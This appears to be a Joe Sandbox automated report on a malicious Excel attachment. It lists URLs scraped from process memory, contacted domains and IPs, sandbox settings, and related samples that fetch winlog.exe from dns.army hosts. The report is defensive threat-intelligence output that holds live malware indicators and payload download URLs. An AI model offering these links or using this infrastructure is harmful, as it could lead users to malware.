          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ow.ly
          54.67.57.56
          truefalse
            high
            algreenstdykeghestqw.dns.army
            103.140.251.164
            truefalse
              unknown
              overseaexpert.com
              191.96.163.202
              truetrue
                unknown
                athara-kiano.com
                103.251.44.218
                truetrue
                  unknown
                  www.fashionwatchesstore.com
                  104.21.61.250
                  truetrue
                    unknown
                    oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com
                    52.57.196.177
                    truefalse
                      high
                      www.evoslancete.com
                      unknown
                      unknowntrue
                        unknown
                        www.athara-kiano.com
                        unknown
                        unknowntrue
                          unknown
                          www.oryanomer.com
                          unknown
                          unknowntrue
                            unknown
                            www.overseaexpert.com
                            unknown
                            unknowntrue
                              unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.athara-kiano.com/nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0gtrue
                              • Avira URL Cloud: safe
                              unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://search.ebay.de/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://www.mtv.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://www.rambler.ru/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://buscar.ya.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://www.iis.fhg.de/audioPAvbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://asp.usatoday.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://rover.ebay.comexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://search.ebay.in/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://%s.comexplorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            low
                                                            http://msk.afisha.ru/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              high
                                                              http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://search.rediff.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://search.naver.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://www.google.ru/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://search.daum.net/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://buscar.ozu.es/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://search.about.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.ask.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.cjmall.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://search.centrum.cz/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://suche.t-online.de/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.google.it/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://search.auction.co.kr/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.ceneo.pl/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://www.amazon.de/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2160641622.000000000040A000.00000008.00020000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000002.2375810590.0000000000260000.00000004.00000020.sdmpfalse
                                                                                                        high
                                                                                                        http://sads.myspace.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://search.sify.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://search.ebay.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://search.nifty.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.google.si/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.google.cz/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.soso.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.univision.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://search.ebay.it/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://busca.orange.es/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.target.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://buscador.terra.es/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.iask.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.tesco.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.interpark.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://investor.msn.com/explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://search.espn.go.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://service2.bfast.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://www.%s.comPAvbc.exe, 00000004.00000002.2166184951.0000000001FE0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2169244442.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              low
                                                                                                                                                              http://ariadna.elmundo.es/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                                high

                                                                                                                                                                Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                103.140.251.164
                                                                                                                                                                unknownViet Nam
                                                                                                                                                                135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNfalse
                                                                                                                                                                54.67.57.56
                                                                                                                                                                unknownUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                191.96.163.202
                                                                                                                                                                unknownChile
                                                                                                                                                                61317ASDETUKhttpwwwheficedcomGBtrue
                                                                                                                                                                52.57.196.177
                                                                                                                                                                unknownUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                104.21.61.250
                                                                                                                                                                unknownUnited States
                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                103.251.44.218
                                                                                                                                                                unknownIndonesia
                                                                                                                                                                131775IDNIC-JALANET-AS-IDPTJupiterJalaArtaIDtrue

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                                Analysis ID:356571
                                                                                                                                                                Start date:23.02.2021
                                                                                                                                                                Start time:10:24:37
                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 10m 0s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:light
                                                                                                                                                                Sample file name:QTN3C2AF414EDF9_041873.xlsx
                                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • HDC enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.troj.expl.evad.winXLSX@9/12@8/6
                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                HDC Information:
                                                                                                                                                                • Successful, ratio: 34.4% (good quality ratio 32.7%)
                                                                                                                                                                • Quality average: 72.5%
                                                                                                                                                                • Quality standard deviation: 29.1%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 84%
                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Adjust boot time
                                                                                                                                                                • Enable AMSI
                                                                                                                                                                • Found application associated with file extension: .xlsx
                                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                • Attach to Office via COM
                                                                                                                                                                • Scroll down
                                                                                                                                                                • Close Viewer
                                                                                                                                                                Warnings:
                                                                                                                                                                Show All
                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                                • TCP Packets have been reduced to 100

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                10:26:11API Interceptor76x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                                10:26:17API Interceptor34x Sleep call for process: vbc.exe modified
                                                                                                                                                                10:26:37API Interceptor212x Sleep call for process: ipconfig.exe modified
                                                                                                                                                                10:27:19API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                103.140.251.164quotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestqw.dns.army/receipat/winlog.exe
                                                                                                                                                                HBL VRN0924588.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • thdyalgreenkeghethbm.dns.army/receipat/winlog.exe
                                                                                                                                                                Smart Tankers Qoute no. 2210.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestyc.dns.army/receipat/winlog.exe
                                                                                                                                                                MV SEIYO FORTUNE REF 27 - QUOTATION.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestak.dns.army/receipat/winlog.exe
                                                                                                                                                                INV-08974589.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestak.dns.army/receipat/winlog.exe
                                                                                                                                                                PO-098907654467.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestak.dns.army/receipat/winlog.exe
                                                                                                                                                                DOC_KDB_06790-80.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • wsdyalgreenkeghewsmq.dns.army/receipat/winlog.exe
                                                                                                                                                                DOC_1WE074665678654.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • wsdyalgreenkeghewsmq.dns.army/receipat/winlog.exe
                                                                                                                                                                2089876578 87687.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestdb.dns.army/receipat/winlog.exe
                                                                                                                                                                IN 20201125 PL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestdb.dns.army/receipat/winlog.exe
                                                                                                                                                                INV_TMB_C108976.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • algreenstdykeghestdb.dns.army/receipat/winlog.exe
